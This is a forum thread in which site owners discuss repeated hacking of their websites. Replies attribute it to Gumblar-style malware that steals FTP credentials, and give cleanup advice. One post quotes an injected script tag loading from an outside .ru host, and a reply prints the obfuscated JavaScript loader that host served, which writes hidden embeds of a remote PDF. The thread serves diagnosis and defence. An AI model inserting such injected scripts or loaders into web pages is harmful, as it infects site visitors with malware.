Sites being hacked

sunnyraink

Hi there, Im a designer for several sites (all hosted by the same company), I keep getting message on google that the site has been hacked. I then have to go through process of cleaning files, re-uploading etc. Its soooo time consuming. Is anyone else experiencing this or is it just lack of security by my hosting company (when i asked them they said its not just them though)

cpu-dude

sunnyraink wrote: »

Hi there, Im a designer for several sites (all hosted by the same company), I keep getting message on google that the site has been hacked. I then have to go through process of cleaning files, re-uploading etc. Its soooo time consuming. Is anyone else experiencing this or is it just lack of security by my hosting company (when i asked them they said its not just them though)

Can we an example of one of this sites please? I know Google reports that it could be damaging to your computer but never hacked...

aidan_walsh

when i asked them they said its not just them though

Its not either. Depending on how access was gained, it could well have been an exploit in user installed software, which is your reponsibility to keep up to date - as is ensuring that inputs are sanitised, folders are not accessible to the public, etc.

oeb

sunnyraink wrote: »

Hi there, Im a designer for several sites (all hosted by the same company), I keep getting message on google that the site has been hacked. I then have to go through process of cleaning files, re-uploading etc. Its soooo time consuming. Is anyone else experiencing this or is it just lack of security by my hosting company (when i asked them they said its not just them though)

Have you tried up to date virus scans? Sounds like Gumblar or one of the related types.

http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/

tricky D

These pages might help.

http://wheelersoftware.com/articles/...n-kisswow.html

or less likely

http://blog.unmaskparasites.com/2009...om-cn-domains/

(Includes cleanup instructions)

Could be js, php or cgi being called.


Also worth reading

http://www.webologist.co.uk/2009/05/...to-remove.html

chakotha

Does sound like a gumblar type.

It might be your computer or a remote script that is re-infecting the websites. As far as I remember the worm compromises your FTP credentials then keeps re-infecting web pages even after you have cleaned them.

I think you have to login to your hosting control panel from a "clean" computer and change the FTP login details.

And then scan your own computer with malwarebytes removing the bad stuff before connecting again via the new FTP details.

mneylon

Sounds like Gumblar

B1977

</head>
<script src=http://fundkb.ru/pics_t_2008/sostav_2008.php ></script><body>
<div class="wrapper">

is this code shown above causing google to stop my website from being shown

Liam Byrne

B1977 wrote: »

</head>
<script src=http://fundkb.ru/pics_t_2008/sostav_2008.php ></script><body>
<div class="wrapper">

is this code shown above causing google to stop my website from being shown

I doubt anyone's gonna check that URL out, tbh.

Bottom line is, if you didn't put that script there, it's malicious, and is probably the cause of the Google warning.

oeb

B1977 wrote: »

</head>
<script src=http://fundkb.ru/pics_t_2008/sostav_2008.php ></script><body>
<div class="wrapper">

is this code shown above causing google to stop my website from being shown

Yes.

Content of that URL is :

// 404 <script>
PDI=24;if(prompt)PDI='';tt3=unescape('%'+PDI);
var uF3='documeY6eX74.wrX69te(x22G3cdivX20stX79leY3dY5cx22pox73itiX6fG6eG3aabG73oluY74ex3b leftG3aY2d1000pG78Y3b topx3aG2dX3100X30pG78Y3bX5cY22x3ex22)x3bdocY75x6dent.write(Y27X3cY65mbG65X64 widthX3d10X30 heigX68tY3d1X30Y30 sY72X63x3dX22httpG3aX2fG2faX72Y74iclX65s.Y6borajaX2eY63x6fx6dx2fshowcax74.phpX3fciG64Y3dY387X26Y63X6eX3dMY75sicx2bG25Y32Y36+MP3G3fsX3dpfX59SH6px4fx26idY3dx32x22 tX79pG65Y3dx22x61ppliY63atG69onY2fx70dY66Y22x3ex3cx2fembeG64x3eX27)G3bdocuY6dX65x6et.wX72itx65(Y27G3cG65mbeG64 widtY68X3d1G300 G68eightY3d1G300 srY63X3dx22httpX3aG2fX2farticleY73Y2ekoraY6aY61.comX2fshoX77cat.phpX3fcX69dX3d87G26cnX3dMusic+Y2526+MP3X3fX73Y3dX70x66X59SHY36G70OY26idx3d3Y22X3eY3cY2fembeY64Y3eG27)Y3bdY6fX63umX65nt.wG72itG65(Y22X3cY2fY64X69vx3eY22)Y3b';
eval(unescape(uF3.replace(/[XGxY]/g,tt3)));

//</script>

That's defianatly grumblar. And yes, that's what's causing google to recognise your site as malware.

(Just removing that wont fix your problem, because the infected machine will just modify the site again)

B1977

where can i find that code in the website,every time i delete it a new one appears,is there a source somewhere else

oeb

B1977 wrote: »

where can i find that code in the website,every time i delete it a new one appears,is there a source somewhere else

As has been mentioned in the thread
Your computer is infected. It is modifying the site. Remove the virus from your machine first, or change the FTP passwords from a different, clean machine, and sanitize the site from there